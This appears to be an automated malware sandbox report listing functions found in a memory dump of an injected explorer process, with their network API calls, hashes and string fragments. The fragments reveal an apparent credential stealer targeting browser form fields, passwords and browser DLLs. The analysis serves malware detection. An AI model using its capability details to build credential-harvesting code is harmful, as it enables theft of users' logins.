                                      • Instruction Fuzzy Hash: 2F015E30618B1C8FCB84EF1CE088B55B7E0FB59315F1545AED94DCB226C674C8818BC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 8894732 (basic blocks 8894732-88947ab); API call connect; internal call into 8897942]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: connect
                                      • String ID: conn$ect
                                      • API String ID: 1959786783-716201944
                                      • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                      • Instruction ID: a60cb2fdcc1f573fcd5962d2a4ceebcff4ac34ab5d2b67aa95965783f8725798
                                      • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                      • Instruction Fuzzy Hash: 4C012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1641AEA84DCB226CA74C9818BC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 88946b2 (basic blocks 88946b2-889472d); API call send; internal call into 8897942]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID: send
                                      • API String ID: 2809346765-2809346765
                                      • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                      • Instruction ID: af582b76d523a6c45940bab1b6475a1031670af52d59321cbb542e15bb9736ce
                                      • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                      • Instruction Fuzzy Hash: C4011270618A1C8FDB88EF1CD048B2577E0EB58315F1545AED85DCB266C670D8818B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 88945b2 (basic blocks 88945b2-889462b); API call socket; internal call into 8897942]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID: sock
                                      • API String ID: 98920635-2415254727
                                      • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                      • Instruction ID: 93b42a66b275dcb8b513946a2b7d105e1ce258986be5a2c8c925e23d58e0f019
                                      • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                      • Instruction Fuzzy Hash: 6D0121706186188FCB84EF1CD048B54BBE0FB59315F1545ADD45ECB266C7B4C9818B86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 888c2dd (basic blocks 888c2dd-888c40e); API call SleepEx in a loop; internal calls into 8897942, 8896f12, 888ce72, 888d432 and 888c0f2]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                      • Instruction ID: 79c267a6d9f6000781f1e3b6f5bae7bee04e169533619e1de527963039775ca6
                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                      • Instruction Fuzzy Hash: AD317E74654B0ADFDBA4EF2980882A5B7A2FB55306F44427FC91DCB60AC7349052DFE2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                      • Instruction ID: b1f73688902912c046b01cc5b713e0149ddfd71f9d8fa12ea98cafd8a0012bcf
                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                      • Instruction Fuzzy Hash: 7FF0C234268A484FDB88EF2CD84563AB3D0EBA9215F44463EA58DC3264DA29C5814716
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                      • API String ID: 0-393284711
                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                      • Instruction ID: 859e86565e1a2d85d091be55263ff0b59fd613ca3ed8b5dd3e85c790a6eb303f
                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                      • Instruction Fuzzy Hash: 01E17E70518F488FC769EF68C498BAAB7E0FB98300F404A2E959FC7295DF30A901CB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                      • API String ID: 0-2916316912
                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                      • Instruction ID: 5076b6dec56c080448a9f5a1297190cf71e8f07fbc0bfc356f7428d4d8ca2eed
                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                      • Instruction Fuzzy Hash: BDB15D30518B48CEDB55EF68C489AEEB7F1FF98300F50491ED49AC7261DF7099058B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                      • API String ID: 0-1539916866
                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                      • Instruction ID: fe2b579cf2b7e12c61c275d00c1dc26ef54e0ad755771095211472a9dd012662
                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                      • Instruction Fuzzy Hash: 5341BE70A18B08CFDB14DF88A4596BEBBE2FB88700F40025ED809D3295DBB59D458BD6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                      • API String ID: 0-355182820
                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                      • Instruction ID: 7a52a537d13f6d0aaa341523c32ca3d2c38d3cba678da2aaeb68cc0d4de0140b
                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                      • Instruction Fuzzy Hash: C9C16E70618B09CFC758EF64C499ADAF3E1FB98304F404B1E955AC7260DF70AA15CB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                      • API String ID: 0-97273177
                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                      • Instruction ID: 15a6c4ba4bb5072a10b95cd9a21ea550e4fc67709374f535b8c3b44284e1023b
                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                      • Instruction Fuzzy Hash: 9451D230218748CFD719DF18D4852AAB7E5FBC4304F501A2EE99B87292DBB49906CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                      • API String ID: 0-639201278
                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                      • Instruction ID: 9c961d81d0c5243f15daf0b1e6e56f6c638fc0cdb086c0a652bf0e5bd21426bc
                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                      • Instruction Fuzzy Hash: B6C1C371618A198FC758EF68D459AAAF3E1FB98310F40472D940EC72A5DF70EE01CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                      • API String ID: 0-639201278
                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                      • Instruction ID: 0d2a9d420e22d0abaedc31785244e0dba46e7783610c6ca286c9a96713bba51b
                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                      • Instruction Fuzzy Hash: 0EC1C271618A198FC758EF68D459AEAF3E1FB98310F40472D940AC72A5DF70EE02CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UR$2$L: $Pass$User$name$word
                                      • API String ID: 0-2058692283
                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                      • Instruction ID: 8c3eeca474c2e0e43cd2f442808939733d43570578a5b5f24d957a582cb9a39f
                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                      • Instruction Fuzzy Hash: 8BA18170618748CBDB29EF68D4447EEB7E1FB94300F404A2DE48AD7291EF709A458B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: UR$2$L: $Pass$User$name$word
                                      • API String ID: 0-2058692283
                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                      • Instruction ID: a04abe093f1a8460523e5cc2d09ec53923f682f74b66c6b1e42b4ae70054223b
                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                      • Instruction Fuzzy Hash: D0915170618748CFDB29EFA8D444BEEB7E1FB98300F40462DE44AD7291EF749A458B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.$e$n$v
                                      • API String ID: 0-1849617553
                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                      • Instruction ID: 6f63099db3e343678434857ac1e39aed4e1653c90cae0a0f41cb806d49508fbe
                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                      • Instruction Fuzzy Hash: DB717031618B48CFD758EFA8D4886AAB7F1FF98304F000A2ED45AC7261EB71DD458B85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                      • API String ID: 0-1970020201
                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                      • Instruction ID: dd30898425257bffa971261b8342b0fbb075baf63c3c745a17dcb6376201e20c
                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                      • Instruction Fuzzy Hash: 05514CB0918B4C8FDB55EFA8C044AEEB7E1FF58301F404A2E959AE7254EF7095418B89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4$\$dll$ion.$vers
                                      • API String ID: 0-1610437797
                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                      • Instruction ID: 3bf96906cd4bf11fc92d3ef484e037102a018820e63bd7b09ceb05dc53fca186
                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                      • Instruction Fuzzy Hash: 1F416F30218B48CFCB65EF2498557EA73E4FF99301F45462E995EC7250EF30D9058B82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 32.d$cli.$dll$sspi$user
                                      • API String ID: 0-327345718
                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                      • Instruction ID: dbb4af2b39082c0c3c37a7edbaa38cb727a726dcd24b393f7a97b71339fcd5ca
                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                      • Instruction Fuzzy Hash: C4415030A19E0DCFCB58EF5880997AD77E5FB58304F84456EA80ADB2A0DA70D940CB86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$el32$h$kern
                                      • API String ID: 0-4264704552
                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                      • Instruction ID: e9b4ed66ca985f4730e2aa314a44df2765ecf8077e3246c927a90a174176108d
                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                      • Instruction Fuzzy Hash: 17418570608B488FD769DF2894983AAB7E1FBA8301F144A2FD59EC3265DB70C945CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $Snif$f fr$om:
                                      • API String ID: 0-3434893486
                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                      • Instruction ID: b5acecc76be0304af396c321bd0fa4a333255ace95586a0055e95e9a0fc303a8
                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                      • Instruction Fuzzy Hash: 7931C57151CB489FD71ADF68C4986DAB7D4FB94300F504D1ED49BC72A1EE30AA4ACB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $Snif$f fr$om:
                                      • API String ID: 0-3434893486
                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                      • Instruction ID: 602c330575d5bcd6e23cc6d90d3c5c16ff9ac74ae672cb044d1fe7a294eb385e
                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                      • Instruction Fuzzy Hash: 9C31C571518B48AFD729EF24C4986DAB7D4FB94300F504D1EE49BC72A5EE30EA06CA42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$chro$hild$me_c
                                      • API String ID: 0-3136806129
                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                      • Instruction ID: 46925d62a66058b7a6bdf35020e8855bdb4c330d505b4757146ded6c8eb10e95
                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                      • Instruction Fuzzy Hash: C8317231118B488FC784EF689498BAAB7E1FBD8300F84493D944AC72A5DF30CA45CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .dll$chro$hild$me_c
                                      • API String ID: 0-3136806129
                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                      • Instruction ID: 7b73391115b9a1bf4f9f931734e512b8f1e6929ac2b930cba51a4e461e87cc61
                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                      • Instruction Fuzzy Hash: 02317271118B488FC794EF689498BAAB7E1FFD8300F844A3D944AC72A5DF30CA45CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 0-319646191
                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction ID: 2060dfd28831496c3dbad5fe138b63dccf0a246e2fd7de40949b69ce99dfd0f7
                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction Fuzzy Hash: 0031E331614A0C8FCB14EFA8C8887EDB7E0FF58205F40062AD45ED7290DF748A45C789
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 0-319646191
                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction ID: fa64614ee70e16273fed8b61b20cd37c75c9c729fb61cc909afdaa0cd5bb08f6
                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction Fuzzy Hash: 1A21E630A10A0CCFCB15EFA8C8487ED7BE0FF58204F40462AD45AD7290DF749A05CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$l$l$t
                                      • API String ID: 0-168566397
                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                      • Instruction ID: c6bf54c4188c523a1c9eac14986943fa03e5baf5e1a14048373cd2105166160d
                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                      • Instruction Fuzzy Hash: 5C217C70A24B0DDBDB44EFA8D0487EEBAF0FB58304F504A2ED019D3660DB749A518B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .$l$l$t
                                      • API String ID: 0-168566397
                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                      • Instruction ID: 223e5fedc36cca7804e461d89228de4a602e0e2157d284a5cf801674e18d1962
                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                      • Instruction Fuzzy Hash: 7A218B70A24A0DDBDB48EFA8D0487EEBBF0FB58304F504A2ED019D3650DB749A518B84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2519782979.000000000E6C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_e6c0000_explorer.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: auth$logi$pass$user
                                      • API String ID: 0-2393853802
                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                      • Instruction ID: 562061f22a2c573669483d1b04ca3eb6046e7707c59e53fc313cfca41ef5fe37
                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                      • Instruction Fuzzy Hash: A921C030624B0DCBCB05DF9998906EEB7E1EF88344F404619E40ADB294D7B1DA148BC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%